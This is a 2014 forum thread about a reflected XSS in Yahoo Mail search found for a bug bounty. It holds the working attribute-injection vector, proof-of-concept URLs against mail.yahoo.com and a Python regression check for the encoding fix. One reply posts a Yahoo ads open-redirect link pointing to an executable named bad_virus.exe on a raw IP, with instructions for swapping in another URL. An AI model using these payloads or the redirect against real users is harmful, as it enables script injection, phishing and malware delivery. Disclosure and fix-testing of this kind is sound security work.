SilenTx0 Posted April 15, 2014 (edited)
No user interaction:
<img alt=" autofocus=true onfocus=alert(1) a="">
Why did I use this vector? Because if I put <img src=x onerror=alert(1)>, it deleted onerror=alert(1) (or any other event handler I would have used). After several bypass attempts, I noticed that it left the alt and src attributes in place. I couldn't do anything through src, so I used the alt attribute. I saw that if I put a space inside the value of the alt attribute, quotes are automatically inserted where it finds the first space. Now, in the source it looks something like this:
<input class="uh-srch-box" autofocus=true onfocus=alert(1) value="<img alt=" name="s">
Why autofocus=true? If I had put only autofocus, ="" would have been appended, because the script checks whether every attribute has a value. If an attribute had no value, it added ="" on its own and my vector would no longer have worked (without user interaction).
Edited April 16, 2014 by SilenTx0
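The bug described in this post is a reflection into a double-quoted attribute without attribute-context encoding. The example below is added for illustration and is not the author's or Yahoo's code: it renders the posted search term into the input's value attribute both unencoded and with html.escape(quote=True), then uses Python's HTML parser to check whether the term stayed inside the attribute. The function names and the input markup shape are assumptions.

```python
import html
from html.parser import HTMLParser

# Search term quoted in the thread, reused here as the test input.
PAYLOAD = '<img alt=" autofocus=true onfocus=alert(1) a="">'


def render_unencoded(term):
    """Reflects the term into value="..." as-is (the behaviour the post describes)."""
    return f'<input class="uh-srch-box" value="{term}" name="s">'


def render_encoded(term):
    """Fix: encode for a double-quoted attribute context. html.escape with
    quote=True rewrites & < > " and ', so the term cannot close the quote and
    introduce attributes of its own. Stripping on* handlers is not needed."""
    return f'<input class="uh-srch-box" value="{html.escape(term, quote=True)}" name="s">'


class FirstInput(HTMLParser):
    """Records the attributes a browser would see on the first <input> element."""

    def __init__(self):
        super().__init__()
        self.attrs = None

    def handle_starttag(self, tag, attrs):
        if tag == "input" and self.attrs is None:
            self.attrs = dict(attrs)  # parser already decodes entities in values


def parsed_input_attrs(markup):
    parser = FirstInput()
    parser.feed(markup)
    parser.close()
    return parser.attrs or {}


def value_stays_contained(markup, term):
    """True only if the reflected term is confined to the value attribute:
    the element carries exactly the expected attributes and the value round-trips."""
    attrs = parsed_input_attrs(markup)
    return set(attrs) == {"class", "value", "name"} and attrs["value"] == term


if __name__ == "__main__":
    # Unencoded: parser sees autofocus/onfocus attributes on the <input>.
    print(parsed_input_attrs(render_unencoded(PAYLOAD)))
    # Encoded: only class/value/name survive and value equals the original term.
    print(value_stays_contained(render_encoded(PAYLOAD), PAYLOAD))
```

The check is what a regression test for this fix should assert: the rendered element has no attributes beyond the expected ones, regardless of what the search term contains.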
Byte-ul Posted April 17, 2014
Very cool... but... why doesn't it turn < and " into &lt; and &quot; when you enter <img alt ?
SilenTx0 (Author) Posted April 17, 2014
Quoting Byte-ul: Very cool... but... why doesn't it turn < and " into &lt; and &quot; when you enter <img alt ?
Because back then they had not put htmlentities in place; they have since fixed the vulnerability.
SilenTx0 (Author) Posted June 19, 2014
Initially I received a duplicate on this vulnerability. I saw that after about two weeks it still wasn't fixed, so I reported it again. Surprise: VALID. The reward leaves something to be desired...
http://awesomescreenshot.com/0aa3093z34
poq Posted June 19, 2014
But how did they fix it back then, and now you found it again?
SilenTx0 (Author) Posted June 19, 2014
Quoting poq: But how did they fix it back then, and now you found it again?
You know how the Yahoo people are... They renamed the application that did the search from searchnew to search, instead of using a function that filters the data (Yahoo style). It's true that if you clicked the link I sent in the first report the XSS didn't work, but if you put the vector directly into search, it worked perfectly. The same thing happened to me with a bug in maps.yahoo.com: initially I got a duplicate, I reported it again and got valid :)).
Link given in the first report (duplicate): https://us-mg6.mail.yahoo.com/neo/b/searchnew?s=<img+alt="+autofocus=true+onfocus=alert(1)+a="">&fid=%40S%40Search&srchWebUrl=http://search.yahoo.com/search?fr=ush-mail&srchMail=Search+Mail
Link given in the second report (valid): https://us-mg6.mail.yahoo.com/neo/b/search?s=<img+alt="+autofocus=true+onfocus=alert(1)+a="">&fid=%40S%40Search&srchWebUrl=http://search.yahoo.com/search?fr=ush-mail&srchMail=Search+Mail
yo20063 Posted June 19, 2014
Won't fix
https://ads.yahoo.com/clk?3,eJytjdEKgjAYhZ-mOxE3Z1tIF78tQWmW0Ygu1WWm1oIE0advgdUL9HEuzuE.hx-5vuNSRhjBOM.VPM8yHxEP07JUJWKW4.smL4iD6IJiqz1rDTvFBHDRuCyAN5FMix4-JDlEk5UAKYTrxx32053KVQJ.gbMmkJM3.y5GnIGnqB07MvjVqjYZ0zEZ5bA5xleBRScOYSsGdN1yiTYHdTvVEm953Ii6IOLyXS4tq-q6x3PmwgyHRn3f20NWaW0X-mbyC-CRWOg=,$http://193.27.70.11/bad_virus.exe
To use it, just change the URL at the end.
PS: it has been working for 3 months now.
SilenTx0 (Author) Posted June 19, 2014
Quoting yo20063: Won't fix https://ads.yahoo.com/clk?3,eJytjdEKgjAYhZ-mOxE3Z1tIF78tQWmW0Ygu1WWm1oIE0advgdUL9HEuzuE.hx-5vuNSRhjBOM.VPM8yHxEP07JUJWKW4.smL4iD6IJiqz1rDTvFBHDRuCyAN5FMix4-JDlEk5UAKYTrxx32053KVQJ.gbMmkJM3.y5GnIGnqB07MvjVqjYZ0zEZ5bA5xleBRScOYSsGdN1yiTYHdTvVEm953Ii6IOLyXS4tq-q6x3PmwgyHRn3f20NWaW0X-mbyC-CRWOg=,$http://193.27.70.11/bad_virus.exe To use it, just change the URL at the end. PS: it has been working for 3 months now.
They haven't been paying for Open Redirect since the beginning of the year.
tpad Posted June 19, 2014
Scam + media coverage = Open Redirect added to the bug bounty again.